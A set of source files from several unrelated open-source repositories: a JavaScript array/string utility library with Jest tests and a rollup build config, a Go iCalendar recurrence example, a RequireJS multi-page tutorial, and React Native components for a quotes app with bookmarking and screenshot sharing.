* U.isObject(null)
* // => false
*
* U.isObject([1, 2])
* // => false
*
* U.isObject({})
* // => true
*/
export const isObject = value => value instanceof Object && !isArray(value)
<|start_filename|>test/array.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('lastItem', () => {
const item = U.lastItem([1, 1, 2, 3])
expect(item).toBe(3)
expect(U.lastItem([])).toBeUndefined()
})
test('uniqueItems', () => {
const arr = U.uniqueItems([1, 1, 2, 3, 3, 4, 5])
expect(arr).toEqual([1, 2, 3, 4, 5])
})
test('uniqueItemsBy', () => {
const arr = [
{ id: 0, value: 'a' },
{ id: 1, value: 'b' },
{ id: 2, value: 'c' },
{ id: 0, value: 'd' }
]
expect(U.uniqueItemsBy(arr, (a, b) => a.id == b.id))
.toEqual([
{ id: 0, value: 'a' },
{ id: 1, value: 'b' },
{ id: 2, value: 'c' }
])
expect(U.uniqueItemsBy(arr, (a, b) => a.id == b.id, true))
.toEqual([
{ id: 0, value: 'd' },
{ id: 2, value: 'c' },
{ id: 1, value: 'b' }
])
})
test('repeatItems', () => {
const arr = U.repeatItems([1, 1, 2, 3, 3, 4, 5])
expect(arr).toEqual([1, 3])
})
test('initArray', () => {
const arr1 = U.initArray(3)
expect(arr1).toEqual([null, null, null])
const arr2 = U.initArray(3, {a: 1, b: 2})
expect(arr2).toEqual([{a: 1, b: 2}, {a: 1, b: 2}, {a: 1, b: 2}])
const arr3 = U.initArray(3, (i) => i * 2)
expect(arr3).toEqual([ 0, 2, 4 ])
})
test('mapObject', () => {
let obj = U.mapObject([1, 2, 3], val => val * 2)
expect(obj).toEqual({1: 2, 2: 4, 3: 6})
})
test('averageBy', () => {
const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
let r = U.averageBy(arr, 'a')
expect(r).toBe(1.5)
r = U.averageBy(arr, o => o.a * o.b)
expect(r).toBe(5)
})
test('maxBy', () => {
const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
let r = U.maxBy(arr, 'a')
expect(r).toBe(2)
r = U.maxBy(arr, o => o.a * o.b)
expect(r).toBe(8)
})
test('minBy', () => {
const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
let r = U.minBy(arr, 'a')
expect(r).toBe(1)
r = U.minBy(arr, o => o.a * o.b)
expect(r).toBe(2)
})
test('chunk', () => {
expect(U.chunk).toBeInstanceOf(Function)
const arr = U.chunk([1, 2, 3, 4, 5], 2)
expect(arr).toEqual([[1,2],[3,4],[5]])
})
<|start_filename|>test/function.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('once', () => {
expect(U.once).toBeInstanceOf(Function)
expect(typeof U.once(x => 10)).toBe('function')
const fn = U.once(() => '5')
expect([fn(), fn()]).toEqual(['5', undefined])
})
test('debounce', () => {
expect(U.debounce).toBeInstanceOf(Function)
U.debounce(() => {
expect(true).toBeTruthy();
})
})
test('throttle', () => {
expect(U.throttle).toBeInstanceOf(Function)
let throttled = U.throttle(x => x, 100000);
expect(throttled).toBeInstanceOf(Function);
expect(throttled(10)).toBe(undefined);
})
test('pipe', () => {
expect(U.pipe).toBeInstanceOf(Function)
})
<|start_filename|>rollup.config.js<|end_filename|>
import json from 'rollup-plugin-json'
import resolve from 'rollup-plugin-node-resolve'
import commonjs from 'rollup-plugin-commonjs'
import babel from 'rollup-plugin-babel'
import { uglify } from 'rollup-plugin-uglify'
import { eslint } from 'rollup-plugin-eslint'
const plugins = [
json(),
resolve(),
commonjs(),
eslint({
throwOnError: true,
throwOnWarning: true,
include: ['src/**'],
exclude: ['node_modules/**']
}),
babel({
runtimeHelpers: true,
    exclude: 'node_modules/**' // do not transpile code under node_modules
})
]
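// The two build targets below share the plugin chain defined above: a readable UMD
// bundle, and a minified UMD bundle that additionally runs uglify().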
export default [
{
input: 'src/usually.js',
output: {
name: 'U',
file: 'dist/usually.js',
format: 'umd'
},
plugins: plugins
},
{
input: 'src/usually.js',
output: {
name: 'U',
file: 'dist/usually.min.js',
format: 'umd'
},
plugins: [
...plugins,
uglify()
]
}
]
<|start_filename|>src/string.js<|end_filename|>
/** @module String */
import { isUndefined } from './type'
import { random } from './number'
/**
 * Gets the byte length of a string
 * @function byteSize
 * @param {string} str - the input string
* @return {number}
* @example
* U.byteSize('日')
* // => 3
*
* U.byteSize('12')
* // => 2
*
* U.byteSize('hello')
* // => 5
*/
export const byteSize = str => new Blob([str]).size
/**
 * Reverses a string
 * @function reverseString
 * @param {string} str - the input string
 * @return {string}
* @example
* U.reverseString('hello!')
* // => '!olleh'
*/
export const reverseString = str => [...str].reverse().join('')
/**
 * Appends query parameters to a URL
 * @function stringifyURL
 * @param {string} url - the base URL
 * @param {object} params - an object of query parameters
* @return {string}
* @example
* U.stringifyURL('https://www.google.com/', {name: 'john', age: 30})
* // => 'https://www.google.com/?name=john&age=30'
*/
export const stringifyURL = (url, params) => {
url += (/\?/).test(url) ? '&' : '?'
return url += Object.keys(params).map(key => `${key}=${params[key]}`).join('&')
}
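// Note on stringifyURL: parameter values are appended as-is; encodeURIComponent
// them first if they may contain reserved characters.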
/**
 * Parses the query parameters of a URL
 * @function parseURL
 * @param {string} url - the URL string
* @return {object}
* @example
* U.parseURL('http://url.com/page?name=Adam&surname=Smith')
* // => {name: 'Adam', surname: 'Smith'}
*
* U.parseURL('https://www.google.com/')
* // => {}
*/
export const parseURL = url => {
const arr = url.match(/([^?=&]+)(=([^&]*))/g) || []
return arr.reduce((a, v) => ((a[v.slice(0, v.indexOf('='))] = v.slice(v.indexOf('=') + 1)), a), {})
}
/**
 * Removes HTML tags from a string
 * @function removeHTML
 * @param {string} str - the input string
 * @return {string}
 * @example
 * const str = '<p>This is <em>a</em> paragraph.</p>'
 * U.removeHTML(str)
 * // => 'This is a paragraph.'
*/
export const removeHTML = str => str.replace(/<[^>]*>/g, '')
/**
 * Escapes special HTML characters in a string
 * @function escapeHTML
 * @param {string} str - the input string
 * @return {string}
 * @example
 * const str = '<a href="#">you & me</a>'
 * U.escapeHTML(str)
 * // => '&lt;a href=&quot;#&quot;&gt;you &amp; me&lt;/a&gt;'
 */
export const escapeHTML = str => str.replace(
  /[&<>"]/g,
  tag => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;'
  }[tag] || tag)
)
/**
 * Unescapes HTML entities in a string
 * @function unescapeHTML
 * @param {string} str - the input string
 * @return {string}
 * @example
 * const str = '&lt;a href=&quot;#&quot;&gt;you &amp; me&lt;/a&gt;'
 * U.unescapeHTML(str)
 * // => '<a href="#">you & me</a>'
 */
export const unescapeHTML = str => str.replace(
  /&amp;|&lt;|&gt;|&quot;/g,
  tag => ({
    '&amp;': '&',
    '&lt;': '<',
    '&gt;': '>',
    '&quot;': '"'
  }[tag] || tag)
)
/**
 * Replaces all characters between start and end with the given mask character
 * @function mask
 * @param {string|number} str - the input string or number
 * @param {number} [start=0] - optional, start position (default 0, i.e. the beginning of the string)
 * @param {number} [end=0] - optional, offset from the end of the string to stop masking (default 0, i.e. mask to the end)
 * @param {string} [mask='*'] - optional, the mask character (default '*')
 * @return {string}
 * @example
 * U.mask(123456789) // => *********
 * U.mask(123456789, 3) // => 123******
 * U.mask(123456789, 0, 4) // => *****6789
 * U.mask(123456789, 3, 4) // => 123**6789
 * U.mask(123456789, 3, 4, '&') // => 123&&6789
*/
export const mask = (str, start = 0, end = 0, mask = '*') => [...`${str}`].map(
(v, i) => i >= start && i < `${str}`.length - end ? mask : v
).join('')
/**
 * Generates a random hex color value
* @function randomHex
* @return {string}
* @example
* U.randomHex()
* // => "#f13ba7"
*/
export const randomHex = () => '#' + (Math.random() * 0xfffff * 1000000).toString(16).slice(0, 6)
/**
 * Generates a random rgba color value
 * @function randomRgba
 * @param {number} [min=0] - optional, minimum channel value
 * @param {number} [max=256] - optional, maximum channel value (exclusive)
 * @param {number} [alpha=1] - optional, alpha (opacity)
* @return {string}
* @example
* U.randomRgba()
* // => rgba(223,135,252,1)
*
* U.randomRgba(154, 211, 0.5)
* // => rgba(191,178,179,0.5)
*/
export const randomRgba = (min = 0, max = 256, alpha = 1) => {
const color = Array.from({ length: 3 })
.reduce(acc => [...acc, Math.floor(random(min, max))], [])
.concat(alpha ? [alpha] : [0])
.join(',')
return `rgba(${color})`
}
/**
 * Expands a 3-digit hex color value to 6 digits
 * @function extendHex
 * @param {string} shortHex - the 3-digit hex color string
* @return {string}
* @example
* U.extendHex('#03f')
* // => '#0033ff'
*
* U.extendHex('05a')
* // => '#0055aa'
*/
export const extendHex = shortHex => {
return '#' + shortHex.slice(shortHex.startsWith('#') ? 1 : 0)
.split('')
.map(x => x + x)
.join('')
}
/**
 * Converts a hex color value to an rgb (or rgba) color value
 * @function hexToRGB
 * @param {string} hex - the hex color string
 * @param {number} alpha - optional, alpha (opacity)
* @return {string}
* @example
* U.hexToRGB('#e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('#e5f', 0.5)
* // => rgba(238,85,255,0.5)
*/
export const hexToRGB = (hex, alpha) => {
const hasAlpha = !isUndefined(alpha)
let result = hex.slice(hex.startsWith('#') ? 1 : 0)
if (result.length === 3) result = [...result].map(s => s + s).join('')
result = result.match(/[0-9a-f]{2}/gi)
.map(s => parseInt(s, 16))
.concat(hasAlpha ? [alpha] : [])
.join(',')
return `rgb${hasAlpha ? 'a' : ''}(${result})`
}
/**
 * Converts an rgb (or rgba) color value to a hex color value
 * @function RGBToHex
 * @param {string} rgb - the rgb (or rgba) color string
* @return {string}
* @example
* U.RGBToHex('rgb(238,85,255)')
* // => #ee55ff
*
* U.RGBToHex('rgba(238,85,255,0.5)')
* // => #ee55ff
*/
export const RGBToHex = rgb => {
return '#' + rgb.match(/\d{1,3}/g)
.slice(0, 3)
.map(s => Number(s).toString(16).padStart(2, '0'))
.join('')
}
/**
 * Parses a cookie string into an object
 * @function parseCookie
 * @param {string} str - the cookie string
* @return {object}
* @example
* U.parseCookie('taken=bar; equation=E%3Dmc%5E2')
* // => {taken: 'bar', equation: 'E=mc^2'}
*/
export const parseCookie = str => {
return str.split(';')
.map(v => v.split('='))
.reduce((acc, v) => {
acc[decodeURIComponent(v[0].trim())] = decodeURIComponent(v[1].trim())
return acc
}, {})
}
/**
 * Converts a string to a Date object
 * @function stringToDate
 * @param {string} str - the input string
 * @return {date}
 * @example
 * U.stringToDate('2019/5-06').toString()
 * // => Mon May 06 2019 00:00:00 GMT+0800 (China Standard Time)
 *
 * U.stringToDate('2019-5-06 20:21:22:500').toString()
 * // => Mon May 06 2019 20:21:22 GMT+0800 (China Standard Time)
*/
export const stringToDate = str => {
const defs = [0, 1, 1, 0, 0, 0]
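  // defs supplies fallbacks for [year, month, day, hours, minutes, seconds];
  // the month (index 1) is decremented below because the Date constructor expects a 0-based month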
const args = str.split(/[^0-9]+/).map((v, i) => {
const val = Number(v) || defs[i]
return i === 1 ? (val - 1) : val
})
return new Date(...args)
}
/**
 * Converts a camelCase string to dash-case
 * @function camelToDash
 * @param {string} str - the camelCase string
 * @return {string}
 * @example
 * U.camelToDash('camelCase')
 * // => 'camel-case'
*/
export const camelToDash = str => str.replace(/([A-Z])/g,"-$1").toLowerCase()
/**
 * Converts a dash-case string to camelCase
 * @function dashToCamel
 * @param {string} str - the dash-case string
 * @return {string}
 * @example
 * U.dashToCamel('dash-case')
 * // => 'dashCase'
*/
export const dashToCamel = str => str.replace(/\-(\w)/g, (a, l) => l.toUpperCase())
| JofunLiang/usually |
<|start_filename|>Makefile<|end_filename|>
clean:
rm -rf node_modules parts
rm -rf .sass-cache
rm -rf src/snowflakes/static/css
| IGVF-DACC/snovault |
<|start_filename|>src/content/top-bar.json<|end_filename|>
{
"bar": {
"text": "Learn how users are using Kata Containers at OpenInfra Live: Keynotes, November 17-18",
"link": "https://www.eventbrite.com/e/openinfra-live-keynotes-tickets-169507530587",
"button": "REGISTER FOR FREE"
}
}
| kata-containers/www.katacontainers.io |
<|start_filename|>examples/rrule/rrule.go<|end_filename|>
package main
import (
"fmt"
"strings"
"time"
"github.com/apognu/gocal"
)
const ics = `
BEGIN:VEVENT
DTSTART;TZID=Europe/Paris:20190202T130000
DTEND;TZID=Europe/Paris:20190202T150000
DTSTAMP:20180816T112126Z
UID:<EMAIL>
RECURRENCE-ID;TZID=Europe/Paris:20190202T090000
CREATED:20180816T110948Z
DESCRIPTION:
LAST-MODIFIED:20180816T112123Z
LOCATION:
SEQUENCE:1
STATUS:CONFIRMED
SUMMARY:1st of month
TRANSP:OPAQUE
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=Europe/Paris:20190102T090000
DTEND;TZID=Europe/Paris:20190102T110000
DTSTAMP:20180816T112126Z
UID:<EMAIL>
RECURRENCE-ID;TZID=Europe/Paris:20190102T090000
CREATED:20180816T110948Z
DESCRIPTION:
LAST-MODIFIED:20180816T111457Z
LOCATION:
SEQUENCE:0
STATUS:CONFIRMED
SUMMARY:1st of month (edited)
TRANSP:OPAQUE
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=Europe/Paris:20180802T090000
DTEND;TZID=Europe/Paris:20180802T110000
RRULE:FREQ=MONTHLY;BYMONTHDAY=2
EXDATE;TZID=Europe/Paris:20181202T090000
DTSTAMP:20180816T112126Z
UID:4ag<EMAIL>hdh<EMAIL>jl<EMAIL>
CREATED:20180816T110948Z
DESCRIPTION:
LAST-MODIFIED:20180816T110948Z
LOCATION:
SEQUENCE:0
STATUS:CONFIRMED
SUMMARY:1st of month
TRANSP:OPAQUE
END:VEVENT
`
func main() {
start, end := time.Now(), time.Now().Add(12*30*24*time.Hour)
c := gocal.NewParser(strings.NewReader(ics))
c.Start, c.End = &start, &end
c.Parse()
for _, e := range c.Events {
fmt.Printf("%s on %s - %s\n", e.Summary, e.Start, e.End)
}
}
| danesparza/gocal |
<|start_filename|>Gruntfile.js<|end_filename|>
// Grunt configuration.
module.exports = function(grunt) {
grunt.initConfig({
connect: {
server: {
options: {
keepalive: true,
hostname: '127.0.0.1',
port: 8080,
base: '.'
}
}
},
requirejs: {
myaccount: {
options: {
almond: true,
wrap: true,
preserveLicenseComments: false,
          wrapShim: true, // wrap shimmed (non-AMD) modules so they work with RequireJS
baseUrl: "./multi-page/js",
mainConfigFile: "./multi-page/js/config.js",
findNestedDependencies: true,
name: "myaccount",
out: "./multi-page/js/dist/myaccount.js"
}
},
checkout: {
options: {
almond: true,
wrap: true,
preserveLicenseComments: false,
          wrapShim: true, // wrap shimmed (non-AMD) modules so they work with RequireJS
baseUrl: "./multi-page/js",
mainConfigFile: "./multi-page/js/config.js",
findNestedDependencies: true,
name: "checkout",
out: "./multi-page/js/dist/checkout.js"
}
}
}
});
grunt.loadNpmTasks('grunt-contrib-connect');
grunt.loadNpmTasks('grunt-requirejs');
// Default task(s).
grunt.registerTask('default', ['requirejs', 'connect']);
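  // Running `grunt` therefore builds both bundles with the requirejs task and then
  // serves the project root at http://127.0.0.1:8080 via connect.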
};
<|start_filename|>single-page/js/module/moduleC.js<|end_filename|>
// module C
define(function() {
alert('moduleC is executed!');
return {
say: function() {
alert('moduleC is saying...');
}
};
});
<|start_filename|>single-page/js/module/moduleB.js<|end_filename|>
// moduleB
define(['moduleC'], function(moduleC) {
alert('moduleB is executed!');
moduleC.say();
return {
say: function() {
alert('moduleB is saying...');
}
};
});
<|start_filename|>multi-page/js/page/orderInfo.js<|end_filename|>
define(['jquery', 'moduleA', 'ModuleC'],
function($, moduleA, ModuleC) {
function bindChangeOnInput() {
alert('orderInfo bind change on input...');
}
function doSth() {
moduleA.do();
var moduleC = new ModuleC('moduleC');
alert('orderInfo do something...' + moduleC.say());
}
return function() {
bindChangeOnInput();
doSth();
};
});
<|start_filename|>single-page/js/module/moduleA.js<|end_filename|>
// moduleA
define(['moduleB'], function(moduleB) {
alert('moduleA is executed!');
moduleB.say();
return {
say: function() {
alert('moduleA is saying...');
}
};
});
<|start_filename|>multi-page/js/myaccount.js<|end_filename|>
require(['config'], function() {
require(['jquery', 'header', 'footer', 'personInfo', 'shippingAddress'],
function($, header, footer, personInfo, shippingAddress) {
//dom ready
$(function() {
//init comm module
header();
footer();
//init pages
personInfo();
shippingAddress();
console.log('Expected results(you should know why?):');
console.log('header is ok...');
console.log('footer is ok...');
console.log('personInfo bind change on input...');
console.log('moduleA is doing...');
console.log('just test jquery plug function...');
console.log('personInfo do something...');
console.log('shippingAddress bind change on input...');
console.log('moduleB is doing...');
console.log('just use underscore to test shim config...');
console.log('shippingAddress do something...');
});
});
});
<|start_filename|>multi-page/js/page/shippingAddress.js<|end_filename|>
define(['jquery', 'moduleB'],
function($, moduleB) {
function bindChangeOnInput() {
alert('shippingAddress bind change on input...');
}
function doSth() {
moduleB.do();
alert('shippingAddress do something...');
}
return function() {
bindChangeOnInput();
doSth();
};
});
<|start_filename|>multi-page/js/module/ModuleC.js<|end_filename|>
define(['jquery'],
function($) {
function ModuleC(name) {
this.name = name;
}
ModuleC.prototype.say = function() {
return 'I am: ' + this.name;
};
return ModuleC;
});
<|start_filename|>multi-page/js/module/moduleB.js<|end_filename|>
define(['jquery', 'underscore'], function($, _) {
return {
do: function() {
alert('moduleB is doing...');
_.each([1], function() {
alert('just use underscore to test shim config...');
});
}
};
});
<|start_filename|>multi-page/js/checkout.js<|end_filename|>
require(['config'], function() {
require(['jquery', 'header', 'footer', 'paymentInfo', 'orderInfo'],
function($, header, footer, paymentInfo, orderInfo) {
//dom ready
$(function() {
//init comm module
header();
footer();
//init pages
paymentInfo();
orderInfo();
console.log('Expected results(you should know why?):');
console.log('header is ok...');
console.log('footer is ok...');
console.log('paymentInfo bind change on input...');
console.log('moduleB is doing...');
console.log('just use underscore to test shim config...');
console.log('paymentInfo do something...I am: moduleC');
console.log('orderInfo bind change on input...');
console.log('moduleA is doing...');
console.log('just test jquery plug function...');
console.log('orderInfo do something...I am: moduleC');
});
});
});
<|start_filename|>multi-page/js/lib/jquery.plugTest.js<|end_filename|>
;(function($) {
$.fn.plugTest = function() {
return this.each(function() {
alert('just test jquery plug function...');
});
};
})(jQuery);
<|start_filename|>single-page/js/main.js<|end_filename|>
requirejs.config({
baseUrl: 'js',
paths: {
jquery: 'lib/jquery-1.11.1',
moduleA: 'module/moduleA',
moduleB: 'module/moduleB',
moduleC: 'module/moduleC'
}
});
requirejs(['jquery', 'moduleA'], function($, moduleA) {
// DOM ready
$(function() {
alert('document is ready...');
moduleA.say();
console.log('Expected results(you should know why?):');
console.log('1. moduleC is executed!');
console.log('2. moduleB is executed!');
console.log('3. moduleC is saying...');
console.log('4. moduleA is executed!');
console.log('5. moduleB is saying...');
console.log('6. document is ready...');
console.log('7. moduleA is saying...');
});
});
<|start_filename|>multi-page/js/page/personInfo.js<|end_filename|>
define(['jquery', 'moduleA'],
function($, moduleA) {
function bindChangeOnInput() {
alert('personInfo bind change on input...');
}
function doSth() {
moduleA.do();
alert('personInfo do something...');
}
return function() {
bindChangeOnInput();
doSth();
};
});
<|start_filename|>multi-page/js/config.js<|end_filename|>
requirejs.config({
baseUrl: 'js',
paths: {
jquery: 'lib/jquery-1.11.1',
underscore: 'lib/underscore-min',
plugTest: 'lib/jquery.plugTest',
Handlebars: 'lib/handlebars',
personInfo: 'page/personInfo',
shippingAddress: 'page/shippingAddress',
paymentInfo: 'page/paymentInfo',
orderInfo: 'page/orderInfo',
header: 'module/header',
footer: 'module/footer',
moduleA: 'module/moduleA',
moduleB: 'module/moduleB',
ModuleC: 'module/ModuleC'
},
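  // shim lets non-AMD scripts (underscore, Handlebars, the jQuery plugin) join the
  // dependency graph by declaring their dependencies and the global they export.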
shim: {
'underscore': {
exports: '_'
},
'Handlebars': {
exports: 'Handlebars'
},
'plugTest': {
deps: ['jquery'],
exports: 'jQuery.fn.plugTest'
}
}
});
<|start_filename|>multi-page/js/module/header.js<|end_filename|>
define(['jquery'], function($) {
return function() {
alert('header is ok...');
};
});
<|start_filename|>multi-page/js/page/paymentInfo.js<|end_filename|>
define(['jquery', 'moduleB', 'ModuleC'],
function($, moduleB, ModuleC) {
function bindChangeOnInput() {
alert('paymentInfo bind change on input...');
}
function doSth() {
moduleB.do();
var moduleC = new ModuleC('moduleC');
alert('paymentInfo do something...' + moduleC.say());
}
return function() {
bindChangeOnInput();
doSth();
};
});
<|start_filename|>multi-page/js/module/moduleA.js<|end_filename|>
define(['jquery', 'plugTest', 'Handlebars'], function($, plugTest, Handlebars) {
Handlebars.registerHelper('compare', function(old, suggest) {
if(old === suggest) {
return suggest;
} else {
return new Handlebars.SafeString('<span class="address-changed">' + suggest + '</span>');
}
});
return {
do: function() {
alert('moduleA is doing...');
$('body').plugTest();
}
};
});
| nange/requirejs-guide |
<|start_filename|>src/components/index.js<|end_filename|>
import AnimatedTextSwitch from './AnimatedTextSwitch';
import AnimatedBackgroundSwitch from './AnimatedBackgroundSwitch';
import AnimatedIconSwitch from './AnimatedIconSwitch';
import ToggleButton from './ToggleButton';
export {
AnimatedTextSwitch,
AnimatedBackgroundSwitch,
AnimatedIconSwitch,
ToggleButton,
};
<|start_filename|>src/modules/quote/QuoteView.js<|end_filename|>
import React from 'react';
import PropTypes from 'prop-types';
import {
View,
TouchableWithoutFeedback,
} from 'react-native';
import {
AnimatedTextSwitch,
AnimatedBackgroundSwitch,
AnimatedIconSwitch,
} from '../../components';
import styles from '../quotes/styles';
import { BG_TYPES } from '../quotes/QuotesState';
QuoteView.propTypes = {
navigation: PropTypes.shape({
pop: PropTypes.func.isRequired,
state: PropTypes.shape({
params: PropTypes.shape({
quote: PropTypes.shape({
quote: PropTypes.string,
author: PropTypes.string,
}),
}),
}),
}).isRequired,
updateContainerRef: PropTypes.func.isRequired,
toggleBookmark: PropTypes.func.isRequired,
shareQuote: PropTypes.func.isRequired,
isSharing: PropTypes.bool.isRequired,
isBookmarked: PropTypes.bool.isRequired,
};
export default function QuoteView(props) {
const {
navigation,
updateContainerRef,
shareQuote,
isSharing,
isBookmarked,
toggleBookmark,
} = props;
const { quote } = navigation.state.params;
const isDarkBg = quote.bgType === BG_TYPES.BG_BLACK;
return (
<TouchableWithoutFeedback
onPress={() => navigation.pop()}
>
<AnimatedBackgroundSwitch
ref={ref => updateContainerRef(ref)}
isDark={isDarkBg}
style={{
...styles.container,
}}
>
<View style={styles.header}>
<AnimatedIconSwitch
source={require('../../../assets/icons/quote.png')}
style={{
...styles.headerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
{ quote && (
<View style={styles.quoteContainer}>
<AnimatedTextSwitch
style={{
...styles.quoteText,
...isDarkBg ? styles.quoteTextLight : {},
}}
>
{quote.quote}
</AnimatedTextSwitch>
<AnimatedTextSwitch
style={{
...styles.quoteAuthor,
...isDarkBg ? styles.quoteAuthorLight : {},
}}
>
{quote.author}
</AnimatedTextSwitch>
</View>
)}
{ !isSharing && (
<View style={styles.footer}>
<AnimatedTextSwitch
style={{
...styles.footerHelpText,
}}
>
tap to go back
</AnimatedTextSwitch>
<View style={styles.footerIcons}>
<TouchableWithoutFeedback onPress={toggleBookmark}>
<View style={styles.footerIconContainer}>
<AnimatedIconSwitch
source={isBookmarked ?
require('../../../assets/icons/bookmark-filled.png') :
require('../../../assets/icons/bookmark.png')
}
style={{
...styles.footerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
</TouchableWithoutFeedback>
<TouchableWithoutFeedback onPress={shareQuote}>
<View style={styles.footerIconContainer}>
<AnimatedIconSwitch
source={require('../../../assets/icons/share.png')}
style={{
...styles.footerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
</TouchableWithoutFeedback>
</View>
</View>
)}
</AnimatedBackgroundSwitch>
</TouchableWithoutFeedback>
);
}
<|start_filename|>src/modules/quote/QuoteViewContainer.js<|end_filename|>
import { compose, withHandlers, withState } from 'recompose';
import Realm from 'realm';
import { Alert } from 'react-native';
import { captureRef } from 'react-native-view-shot';
import Share from 'react-native-share';
import QuoteView from './QuoteView';
import { QuoteSchema } from '../quotes/QuotesState';
export default compose(
withState('isSharing', 'setIsSharing', false),
withState('isBookmarked', 'setIsBookmarked', true),
withHandlers(() => {
// Reference to container element
let _containerRef = null;
return {
updateContainerRef: () => (ref) => {
_containerRef = ref;
},
shareQuote: props => async () => {
// isSharing prop hides components before making a screen shot
props.setIsSharing(true);
// setTimeout to ensure that component will be re-rendered
setTimeout(async () => {
if (_containerRef) {
try {
// Capturing screenshot of the view by ref
const uri = await captureRef(_containerRef, {
format: 'jpg',
quality: 1,
});
// Sharing captured screenshot
await Share.open({
url: uri,
});
} catch (e) {
if (e.error !== 'User did not share') {
Alert.alert('Something went wrong', 'We are so sorry, but something unexpected happened :(');
}
} finally {
props.setIsSharing(false);
}
}
});
},
toggleBookmark: props => () => {
props.setIsBookmarked(!props.isBookmarked);
const { quote } = props.navigation.state.params;
// Updating the quote inside database
Realm.open({ schema: [QuoteSchema] })
.then((realm) => {
const realmQuote = realm.objects('Quote').filtered(`id = ${quote.id}`)[0];
realm.write(() => {
realmQuote.bookmarked = !realmQuote.bookmarked;
});
realm.close();
});
},
};
}),
)(QuoteView);
<|start_filename|>src/modules/quotes/QuotesViewContainer.js<|end_filename|>
import { connect } from 'react-redux';
import { StatusBar, Alert } from 'react-native';
import { captureRef } from 'react-native-view-shot';
import Share from 'react-native-share';
import {
compose,
lifecycle,
withHandlers,
withState,
} from 'recompose';
import QuotesView from './QuotesView';
import {
loadQuotes,
newQuote,
toggleBookmark,
} from './QuotesState';
export default compose(
connect(
state => ({
quotes: state.quotes.quotesList,
quotesLoaded: state.quotes.quotesLoaded,
currentQuote: state.quotes.currentQuote,
isDarkBg: state.quotes.isDarkBg,
}),
dispatch => ({
loadQuotes: () => dispatch(loadQuotes()),
newQuote: () => dispatch(newQuote()),
toggleBookmark: quote => dispatch(toggleBookmark(quote)),
}),
),
withState('isSharing', 'setIsSharing', false),
withState('isMenuOpened', 'setIsMenuOpened', false),
withHandlers(() => {
let _containerRef = null;
return {
updateContainerRef: () => (ref) => {
_containerRef = ref;
},
shareQuote: props => async () => {
props.setIsSharing(true);
setTimeout(async () => {
if (_containerRef) {
try {
const uri = await captureRef(_containerRef, {
format: 'jpg',
quality: 1,
});
await Share.open({
url: uri,
});
} catch (e) {
if (e.error !== 'User did not share') {
Alert.alert('Something went wrong', 'We are so sorry, but something unexpected happened :(');
}
} finally {
props.setIsSharing(false);
}
}
});
},
};
}),
lifecycle({
componentDidMount() {
StatusBar.setHidden(true);
if (!this.props.quotesLoaded) {
this.props.loadQuotes();
}
},
componentDidUpdate() {
if (this.props.quotesLoaded && !this.props.currentQuote) {
this.props.newQuote();
}
},
}),
)(QuotesView);
<|start_filename|>src/config/index.js<|end_filename|>
import { Platform } from 'react-native';
export const colors = {
light: '#FFFFFF',
dark: '#000000',
gray: '#96979F',
lightGray: '#F4F6F8',
darkGray: '#323643',
flatDarkGray: '#2B2B2B',
};
export const fonts = {
primaryRegular: Platform.select({
    ios: 'System',
android: 'SF-Pro-Text-Regular',
}),
primaryLight: Platform.select({
    ios: 'System',
android: 'SF-Pro-Text-Light',
}),
};
export default {
defaultAnimationDuration: 400,
};
export const credentialsLink = 'https://apps.insider.io';
<|start_filename|>src/modules/bookmarks/BookmarksViewContainer.js<|end_filename|>
import { connect } from 'react-redux';
import Realm from 'realm';
import {
compose, withState, withHandlers,
} from 'recompose';
import { QuoteSchema } from '../quotes/QuotesState';
import BookmarksView from './BookmarksView';
export default compose(
connect(
state => ({
isDarkBg: state.quotes.isDarkBg,
}),
),
withState('bookmarksList', 'setBookmarksList', []),
withHandlers({
updateBookmarks: props => () => {
Realm.open({ schema: [QuoteSchema] })
.then((realm) => {
// Selecting all bookmarked quotes
const bookmarks = realm.objects('Quote').filtered('bookmarked = true');
// Need to convert Realm object to JS TODO: Find better solution
const bookmarksJSed = JSON.parse(JSON.stringify(bookmarks));
const bookmarksArray = [];
Object.keys(bookmarksJSed).forEach(index => bookmarksArray.push(bookmarksJSed[index]));
props.setBookmarksList(bookmarksArray);
realm.close();
});
},
}),
withHandlers({
// Handler that fires when the user navigate on the screen
onWillFocus: props => () => {
props.updateBookmarks();
},
}),
)(BookmarksView);
<|start_filename|>src/components/__tests__/ToggleButton.spec.js<|end_filename|>
/* eslint-disable no-undef */
import React from 'react';
import Enzyme from 'enzyme';
import Adapter from 'enzyme-adapter-react-16';
import { ToggleButton } from '../index';
Enzyme.configure({ adapter: new Adapter() });
describe('Testing ToggleButton component', () => {
it('renders as expected', () => {
const wrapper = Enzyme.shallow(
<ToggleButton>
Hello
</ToggleButton>,
);
expect(wrapper).toMatchSnapshot();
});
});
<|start_filename|>src/modules/quotes/styles.js<|end_filename|>
import EStyleSheet from 'react-native-extended-stylesheet';
import { ifIphoneX } from 'react-native-iphone-x-helper';
import { colors, fonts } from '../../config';
export default EStyleSheet.create({
container: {
flex: 1,
padding: 20,
backgroundColor: colors.light,
...ifIphoneX({
paddingVertical: 30,
}),
},
loadingContainer: {
flex: 1,
alignItems: 'center',
justifyContent: 'center',
backgroundColor: colors.dark,
},
containerDark: {
backgroundColor: colors.dark,
},
quoteContainer: {
flex: 1,
justifyContent: 'center',
},
quoteText: {
fontFamily: fonts.primaryLight,
fontSize: '1.5rem',
fontWeight: '200',
color: colors.dark,
lineHeight: '2.2rem',
},
quoteTextLight: {
color: colors.light,
},
quoteAuthor: {
fontFamily: fonts.primaryLight,
color: colors.gray,
fontSize: '1rem',
fontWeight: '100',
marginTop: '1.2rem',
},
quoteAuthorLight: {
color: colors.gray,
},
header: {
flexDirection: 'row',
justifyContent: 'space-between',
},
headerIcon: {
width: '1rem',
tintColor: colors.dark,
},
headerIconMenu: {
width: '1.3rem',
},
headerIconLight: {
tintColor: colors.light,
},
footer: {
